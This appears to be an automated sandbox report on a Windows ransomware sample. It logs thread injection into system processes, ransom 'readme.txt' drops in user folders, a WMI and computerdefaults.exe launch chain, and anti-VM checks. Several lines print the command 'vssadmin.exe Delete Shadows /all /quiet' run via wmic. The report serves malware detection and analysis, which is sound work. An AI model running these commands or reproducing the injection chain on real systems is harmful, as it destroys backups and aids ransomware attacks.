    Source: classification engineClassification label: mal100.rans.evad.winEXE@57/122@0/0
    Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exeFile created: C:\Users\Public\readme.txtJump to behavior
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6420:120:WilError_01
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6496:120:WilError_01
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3272:120:WilError_01
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6560:120:WilError_01
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2916:120:WilError_01
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5048:120:WilError_01
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4888:120:WilError_01
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6152:120:WilError_01
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6696:120:WilError_01
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6452:120:WilError_01
    Source: C:\Windows\System32\taskhostw.exeMutant created: \Sessions\1\BaseNamedObjects\eltalkfzj
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5488:120:WilError_01
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6620:120:WilError_01
    Source: 7906dc47_by_Libranalysis.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
    Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
    Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
    Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
    Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
    Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
    Source: C:\Windows\System32\ComputerDefaults.exeWMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
    Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
    Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
    Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
    Source: C:\Windows\System32\ComputerDefaults.exeWMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
    Source: C:\Windows\System32\ComputerDefaults.exeWMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
    Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: 7906dc47_by_Libranalysis.exeVirustotal: Detection: 42%
    Source: unknownProcess created: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe 'C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe'
    Source: C:\Windows\System32\sihost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c '%SystemRoot%\system32\wbem\wmic process call create 'cmd /c computerdefaults.exe''
    Source: C:\Windows\System32\sihost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c '%SystemRoot%\system32\wbem\wmic process call create 'cmd /c computerdefaults.exe''
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe C:\Windows\system32\wbem\wmic process call create 'cmd /c computerdefaults.exe'
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe C:\Windows\system32\wbem\wmic process call create 'cmd /c computerdefaults.exe'
    Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c '%SystemRoot%\system32\wbem\wmic process call create 'cmd /c computerdefaults.exe''
    Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c computerdefaults.exe
    Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c '%SystemRoot%\system32\wbem\wmic process call create 'cmd /c computerdefaults.exe''
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c computerdefaults.exe
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe C:\Windows\system32\wbem\wmic process call create 'cmd /c computerdefaults.exe'
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ComputerDefaults.exe computerdefaults.exe
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe C:\Windows\system32\wbem\wmic process call create 'cmd /c computerdefaults.exe'
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ComputerDefaults.exe computerdefaults.exe
    Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c computerdefaults.exe
    Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c computerdefaults.exe
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\ComputerDefaults.exeProcess created: C:\Windows\System32\wbem\WMIC.exe 'C:\Windows\system32\wbem\wmic.exe' process call create 'vssadmin.exe Delete Shadows /all /quiet'
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\ComputerDefaults.exeProcess created: C:\Windows\System32\wbem\WMIC.exe 'C:\Windows\system32\wbem\wmic.exe' process call create 'vssadmin.exe Delete Shadows /all /quiet'
    Source: C:\Windows\System32\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ComputerDefaults.exe computerdefaults.exe
    Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c '%SystemRoot%\system32\wbem\wmic process call create 'cmd /c computerdefaults.exe''
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ComputerDefaults.exe computerdefaults.exe
    Source: C:\Windows\System32\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c '%SystemRoot%\system32\wbem\wmic process call create 'cmd /c computerdefaults.exe''
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exeProcess created: unknown unknown
    Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exeProcess created: unknown unknown
    Source: C:\Windows\System32\sihost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c '%SystemRoot%\system32\wbem\wmic process call create 'cmd /c computerdefaults.exe''
    Source: C:\Windows\System32\sihost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c '%SystemRoot%\system32\wbem\wmic process call create 'cmd /c computerdefaults.exe''
    Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c '%SystemRoot%\system32\wbem\wmic process call create 'cmd /c computerdefaults.exe''
    Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c '%SystemRoot%\system32\wbem\wmic process call create 'cmd /c computerdefaults.exe''
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe C:\Windows\system32\wbem\wmic process call create 'cmd /c computerdefaults.exe'
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe C:\Windows\system32\wbem\wmic process call create 'cmd /c computerdefaults.exe'
    Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c '%SystemRoot%\system32\wbem\wmic process call create 'cmd /c computerdefaults.exe''
    Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c '%SystemRoot%\system32\wbem\wmic process call create 'cmd /c computerdefaults.exe''
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe C:\Windows\system32\wbem\wmic process call create 'cmd /c computerdefaults.exe'
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ComputerDefaults.exe computerdefaults.exe
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe C:\Windows\system32\wbem\wmic process call create 'cmd /c computerdefaults.exe'
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ComputerDefaults.exe computerdefaults.exe
    Source: C:\Windows\System32\ComputerDefaults.exeProcess created: C:\Windows\System32\wbem\WMIC.exe 'C:\Windows\system32\wbem\wmic.exe' process call create 'vssadmin.exe Delete Shadows /all /quiet'
    Source: C:\Windows\System32\ComputerDefaults.exeProcess created: C:\Windows\System32\wbem\WMIC.exe 'C:\Windows\system32\wbem\wmic.exe' process call create 'vssadmin.exe Delete Shadows /all /quiet'
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ComputerDefaults.exe computerdefaults.exe
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ComputerDefaults.exe computerdefaults.exe
    Source: C:\Windows\System32\taskhostw.exeProcess created: unknown unknown
    Source: C:\Windows\System32\taskhostw.exeProcess created: unknown unknown
    Source: C:\Windows\System32\ComputerDefaults.exeProcess created: unknown unknown
    Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
    Source: C:\Windows\System32\ComputerDefaults.exeProcess created: unknown unknown
    Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
    Source: C:\Windows\System32\wbem\WMIC.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Windows\System32\ComputerDefaults.exeKey opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\Outlook\Capabilities\UrlAssociations
    Source: 7906dc47_by_Libranalysis.exeStatic PE information: Image base 0x140000000 > 0x60000000
    Source: 7906dc47_by_Libranalysis.exeStatic PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
    Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exeCode function: 2_2_00007FF6AB572A7A push rcx; retf
    Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exeCode function: 2_2_00007FF6AB572880 push rbp; iretd
    Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exeCode function: 2_2_00007FF6AB573AFE pushfq ; ret
    Source: initial sampleStatic PE information: section name: .text entropy: 7.62659115899

    Persistence and Installation Behavior:

    barindex
    Creates processes via WMIShow sources
    Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
    Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
    Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
    Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
    Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
    Source: C:\Windows\System32\ComputerDefaults.exeWMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
    Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
    Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
    Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
    Source: C:\Windows\System32\ComputerDefaults.exeWMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
    Source: C:\Windows\System32\ComputerDefaults.exeWMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
    Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exeFile created: C:\Users\Public\readme.txtJump to behavior
    Source: C:\Windows\System32\sihost.exeFile created: C:\Users\user\Desktop\GAOBCVIQIJ\readme.txtJump to behavior
    Source: C:\Windows\System32\sihost.exeFile created: C:\Users\user\Desktop\IPKGELNTQY\readme.txtJump to behavior
    Source: C:\Windows\System32\sihost.exeFile created: C:\Users\user\Desktop\LSBIHQFDVT\readme.txtJump to behavior
    Source: C:\Windows\System32\sihost.exeFile created: C:\Users\user\Desktop\NEBFQQYWPS\readme.txtJump to behavior
    Source: C:\Windows\System32\sihost.exeFile created: C:\Users\user\Desktop\readme.txtJump to behavior
    Source: C:\Windows\System32\sihost.exeFile created: C:\Users\user\Documents\GAOBCVIQIJ\readme.txtJump to behavior
    Source: C:\Windows\System32\sihost.exeFile created: C:\Users\user\Documents\IPKGELNTQY\readme.txtJump to behavior
    Source: C:\Windows\System32\sihost.exeFile created: C:\Users\user\Documents\LSBIHQFDVT\readme.txtJump to behavior
    Source: C:\Windows\System32\sihost.exeFile created: C:\Users\user\Documents\NEBFQQYWPS\readme.txtJump to behavior
    Source: C:\Windows\System32\sihost.exeFile created: C:\Users\user\Documents\readme.txtJump to behavior
    Source: C:\Windows\System32\sihost.exeFile created: C:\Users\user\Downloads\readme.txtJump to behavior
    Source: C:\Windows\System32\sihost.exeFile created: C:\Users\Public\readme.txtJump to behavior
    Source: C:\Windows\System32\svchost.exeFile created: C:\Users\Public\readme.txtJump to behavior
    Source: C:\Windows\System32\svchost.exeFile created: C:\Users\Public\readme.txtJump to behavior
    Source: C:\Windows\System32\taskhostw.exeFile created: C:\Users\Public\readme.txt
    Source: C:\Windows\System32\ComputerDefaults.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
    Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exeCode function: 2_2_00007FF6AB572327 rdtsc
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exeCode function: 2_2_000001BB058206B2 FindFirstFileExW,
    Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exeCode function: 2_2_000001BB058906B2 GlobalAlloc,FindFirstFileExW,
    Source: C:\Windows\System32\sihost.exeCode function: 3_2_0000024D2C4106B2 FindFirstFileExW,
    Source: C:\Windows\System32\svchost.exeCode function: 4_2_0000024843FF06B2 FindFirstFileExW,
    Source: C:\Windows\System32\svchost.exeCode function: 11_2_0000020A025A06B2 FindFirstFileExW,
    Source: C:\Windows\System32\taskhostw.exeCode function: 30_2_00000255F9EB06B2 FindFirstFileExW,
    Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exeCode function: 2_2_000001BB0582016A CreateMutexW,GetVolumeInformationW,GetLogicalDriveStringsW,
    Source: sihost.exe, 00000003.00000000.230762461.0000024D2EE30000.00000002.00000001.sdmp, WMIC.exe, 00000009.00000002.243253123.00000232C7520000.00000002.00000001.sdmp, WMIC.exe, 0000000A.00000002.247040845.0000025ED6CC0000.00000002.00000001.sdmp, svchost.exe, 0000000B.00000002.497265670.0000020A02B40000.00000002.00000001.sdmp, WMIC.exe, 00000015.00000002.248951683.0000020D0FA10000.00000002.00000001.sdmp, WMIC.exe, 00000017.00000002.250850741.000001909DD20000.00000002.00000001.sdmp, WMIC.exe, 0000001C.00000002.266576402.0000026D07D60000.00000002.00000001.sdmp, WMIC.exe, 0000001F.00000002.271124084.000002599F830000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
    Source: taskhostw.exe, 0000001E.00000000.249503673.00000255F5824000.00000004.00000001.sdmpBinary or memory string: 1&dispvertres=1024&isu=0&lo=663559&metered=false&nettype=ethernet&npid=sc-314559&oemName=VMware%2C%20Inc.&oemid=VMware%2C%20Inc.&ossku=Professional&smBiosDm=VMware7%2C1&tl=2&tsu=663559&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail=1&waasRing=
    Source: ComputerDefaults.exe, 00000021.00000002.266558256.000001E991F33000.00000004.00000020.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}b8b}\8
    Source: taskhostw.exe, 0000001E.00000002.494889453.00000255F5824000.00000004.00000001.sdmpBinary or memory string: /Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=314559&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:EE4890C5-90AE-59E2-5AC5-C20AA6654592&ctry=US&time=20200930T152422Z&lc=en-US&pl=en-US&idtp=mid&uid=d9fcfe42-b5d5-4629-ac66-c2605ea824c4&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=b89e401591fe4b0d8cb7204159ee5a88&ctmode=MultiSession&arch=x64&cdm=1&cdmver=10.0.17134.1&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.17134.1&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=663559&metered=false&nettype=ethernet&npid=sc-314559&oemName=VMware%2C%20Inc.&oemid=VMware%2C%20Inc.&ossku=Professional&smBiosDm=VMware7%2C1&tl=2&tsu=663559&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail=1&waasRing=
    Source: sihost.exe, 00000003.00000000.230762461.0000024D2EE30000.00000002.00000001.sdmp, WMIC.exe, 00000009.00000002.243253123.00000232C7520000.00000002.00000001.sdmp, WMIC.exe, 0000000A.00000002.247040845.0000025ED6CC0000.00000002.00000001.sdmp, svchost.exe, 0000000B.00000002.497265670.0000020A02B40000.00000002.00000001.sdmp, WMIC.exe, 00000015.00000002.248951683.0000020D0FA10000.00000002.00000001.sdmp, WMIC.exe, 00000017.00000002.250850741.000001909DD20000.00000002.00000001.sdmp, WMIC.exe, 0000001C.00000002.266576402.0000026D07D60000.00000002.00000001.sdmp, WMIC.exe, 0000001F.00000002.271124084.000002599F830000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
    Source: sihost.exe, 00000003.00000000.230762461.0000024D2EE30000.00000002.00000001.sdmp, WMIC.exe, 00000009.00000002.243253123.00000232C7520000.00000002.00000001.sdmp, WMIC.exe, 0000000A.00000002.247040845.0000025ED6CC0000.00000002.00000001.sdmp, svchost.exe, 0000000B.00000002.497265670.0000020A02B40000.00000002.00000001.sdmp, WMIC.exe, 00000015.00000002.248951683.0000020D0FA10000.00000002.00000001.sdmp, WMIC.exe, 00000017.00000002.250850741.000001909DD20000.00000002.00000001.sdmp, WMIC.exe, 0000001C.00000002.266576402.0000026D07D60000.00000002.00000001.sdmp, WMIC.exe, 0000001F.00000002.271124084.000002599F830000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
    Source: taskhostw.exe, 0000001E.00000002.494889453.00000255F5824000.00000004.00000001.sdmpBinary or memory string: https://arc.msn.com/v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=314559&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:EE4890C5-90AE-59E2-5AC5-C20AA6654592&ctry=US&time=20200930T152422Z&lc=en-US&pl=en-US&idtp=mid&uid=d9fcfe42-b5d5-4629-ac66-c2605ea824c4&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=b89e401591fe4b0d8cb7204159ee5a88&ctmode=MultiSession&arch=x64&cdm=1&cdmver=10.0.17134.1&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.17134.1&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=663559&metered=false&nettype=ethernet&npid=sc-314559&oemName=VMware%2C%20Inc.&oemid=VMware%2C%20Inc.&ossku=Professional&smBiosDm=VMware7%2C1&tl=2&tsu=663559&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail=1&waasRing=
    Source: svchost.exe, 00000004.00000000.235490138.0000024844060000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
    Source: sihost.exe, 00000003.00000000.230762461.0000024D2EE30000.00000002.00000001.sdmp, WMIC.exe, 00000009.00000002.243253123.00000232C7520000.00000002.00000001.sdmp, WMIC.exe, 0000000A.00000002.247040845.0000025ED6CC0000.00000002.00000001.sdmp, svchost.exe, 0000000B.00000002.497265670.0000020A02B40000.00000002.00000001.sdmp, WMIC.exe, 00000015.00000002.248951683.0000020D0FA10000.00000002.00000001.sdmp, WMIC.exe, 00000017.00000002.250850741.000001909DD20000.00000002.00000001.sdmp, WMIC.exe, 0000001C.00000002.266576402.0000026D07D60000.00000002.00000001.sdmp, WMIC.exe, 0000001F.00000002.271124084.000002599F830000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
    Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exeProcess information queried: ProcessInformation
    Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exeCode function: 2_2_00007FF6AB572327 rdtsc

    HIPS / PFW / Operating System Protection Evasion:

    barindex
    Creates a thread in another existing process (thread injection)Show sources
    Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exeThread created: C:\Windows\System32\sihost.exe EIP: 0
    Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exeThread created: C:\Windows\System32\svchost.exe EIP: 0
    Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exeThread created: C:\Windows\System32\svchost.exe EIP: 0
    Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exeThread created: C:\Windows\System32\taskhostw.exe EIP: 0
    Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exeThread created: unknown EIP: 0
    Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exeThread created: unknown EIP: 0
    Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exeThread created: unknown EIP: 0
    Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exeThread created: unknown EIP: 0
    Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exeThread created: unknown EIP: 0
    Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exeThread created: unknown EIP: 0
    Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exeThread created: unknown EIP: 0
    Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exeThread created: unknown EIP: 0
    Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exeThread created: unknown EIP: 0
    Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exeThread created: unknown EIP: 0
    Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exeThread created: unknown EIP: 0
    Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exeThread created: unknown EIP: 0
    Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exeThread created: unknown EIP: 0
    Maps a DLL or memory area into another processShow sources
    Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exeSection loaded: unknown target: C:\Windows\System32\sihost.exe protection: execute and read and write
    Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exeSection loaded: unknown target: C:\Windows\System32\svchost.exe protection: execute and read and write
    Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exeSection loaded: unknown target: C:\Windows\System32\svchost.exe protection: execute and read and write
    Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exeSection loaded: unknown target: C:\Windows\System32\taskhostw.exe protection: execute and read and write
    Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exeSection loaded: unknown target: unknown protection: execute and read and write
    Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exeSection loaded: unknown target: unknown protection: execute and read and write
    Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exeSection loaded: unknown target: unknown protection: execute and read and write
    Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exeSection loaded: unknown target: unknown protection: execute and read and write
    Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exeSection loaded: unknown target: unknown protection: execute and read and write
    Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exeSection loaded: unknown target: unknown protection: execute and read and write
    Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exeSection loaded: unknown target: unknown protection: execute and read and write
    Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exeSection loaded: unknown target: unknown protection: execute and read and write
    Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exeSection loaded: unknown target: unknown protection: execute and read and write
    Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exeSection loaded: unknown target: unknown protection: execute and read and write
    Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exeSection loaded: unknown target: unknown protection: execute and read and write
    Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exeSection loaded: unknown target: unknown protection: execute and read and write
    Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exeSection loaded: unknown target: unknown protection: execute and read and write
    Modifies the context of a thread in another process (thread injection)Show sources
    Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exeThread register set: target process: 2952
    Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exeThread register set: target process: 2996
    Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exeThread register set: target process: 3020
    Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exeThread register set: target process: 2736
    Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exeThread register set: target process: 3176
    Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exeThread register set: target process: 3292
    Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exeThread register set: target process: 3528
    Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exeThread register set: target process: 3088
    Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exeThread register set: target process: 3756
    Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exeThread register set: target process: 3688
    Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exeThread register set: target process: 4396
    Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exeThread register set: target process: 4484
    Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exeThread register set: target process: 3200
    Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exeThread register set: target process: 5588
    Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exeThread register set: target process: 5648
    Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exeThread register set: target process: 5796
